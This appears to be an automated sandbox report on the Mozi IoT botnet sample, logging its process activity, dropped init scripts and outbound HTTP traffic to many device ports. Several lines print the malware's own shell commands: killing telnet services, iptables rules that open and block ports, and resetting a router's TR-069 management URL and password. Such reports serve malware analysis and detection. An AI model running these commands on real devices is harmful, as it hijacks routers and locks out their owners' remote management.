                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/28/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/29/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/491/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/250/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/130/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/251/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/252/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/132/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/253/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/254/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/255/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/256/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1599/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/257/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1477/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/379/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/258/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1476/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/259/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1475/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/4501/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/936/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/30/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/4505/statJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6232)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6284)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 41913 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6291)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 41913 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6294)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 41913 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6303)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 41913 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6306)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 41913 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6312)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 41913 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6318)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 41913 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6321)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 41913 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6329)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6335)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6340)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6361)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6367)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6369)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6371)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6374)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6377)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6383)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6389)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6395)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6401)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6407)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6413)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6419)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6425)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6431)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6441)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28674 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6444)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28674 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6451)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28674 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6457)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28674 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6460)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 28674 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6463)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28674 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6466)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28674 -j ACCEPT"Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6469)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28674 -j ACCEPT"Jump to behavior
                            Source: /bin/sh (PID: 6286)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6300)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6305)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6311)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6317)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6320)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6323)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6333)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6337)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6342)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6373)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6376)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6382)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6388)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6394)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6400)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6406)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6412)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6418)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6423)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6430)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6436)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6443)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6448)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6456)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6459)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6462)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6465)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6468)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6474)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28674 -j ACCEPTJump to behavior
                            Source: /usr/bin/dash (PID: 6239)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XlTs5dmQSe /tmp/tmp.5VLGGYD6OI /tmp/tmp.KMqOsJZXWuJump to behavior
                            Source: /usr/bin/dash (PID: 6241)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XlTs5dmQSe /tmp/tmp.5VLGGYD6OI /tmp/tmp.KMqOsJZXWuJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6272)Reads from proc file: /proc/statJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File written: /usr/networksJump to dropped file
                            Source: /tmp/Mozi.m.elf (PID: 6230)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
                            Source: /tmp/Mozi.m.elf (PID: 6230)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
                            Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/init.d/S95baby.shJump to dropped file
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/init.d/keyboard-setup.shJump to dropped file
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/init.d/console-setup.shJump to dropped file
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/init.d/hwclock.shJump to dropped file
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /usr/bin/gettext.shJump to dropped file
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /usr/bin/rescan-scsi-bus.shJump to dropped file
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44588 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46640 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43658 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42464 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36258 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56236 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46270 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51682 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42906 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54856 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47372 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56902 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58104 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38218 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56712 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41536 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57776 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39032 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44088 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58972 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59284 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33870 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45240 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42514 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38010 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44012 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46432 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43002 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53212 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60742 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47894 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58940 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33058 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44964 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33172 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38760 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55892 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48218 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44030 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38550 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48516 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42356 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60138 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56074 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52520 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54080 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34896 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53648 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58484 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41888 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45404 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55402 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42974 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46252 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43262 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42856 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60024 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37314 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54132 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56900 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44034 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57728 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43774 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52258 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52166 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46134 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34002 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33290 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47656 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45000 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47902 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41384 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53088 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36122 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56578 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51812 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48258 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39770 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39032 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57932 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54190 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35932 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51804 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54874 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44164 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38868 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40430 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46876 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56378 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39970 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42338 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33526 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48844 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42984 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57916 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35372 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50582 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33418 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44166 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38328 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42974 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37372 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49316 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55636 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43142 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37428 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40054 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40896 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33286 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40994 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59632 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53756 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33718 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44534 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55572 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46306 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44502 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37644 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37622 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36822 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47802 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53804 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43102 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33050 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44416 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55112 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54226 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43338 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45340 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60746 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34276 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55062 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36032 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58394 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53144 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58366 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43632 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38888 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35100 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43678 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40186 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39344 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51818 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40432 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35642 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44648 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60892 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44506 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34732 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48460 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57210 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59820 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45100 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35700 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58998 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36728 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38448 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50478 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49424 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39332 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34198 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35798 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33070 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33420 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45430 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47912 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54536 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49348 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50832 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59620 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35664 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35390 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59778 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60738 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45496 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51516 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43780 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42766 -> 37215
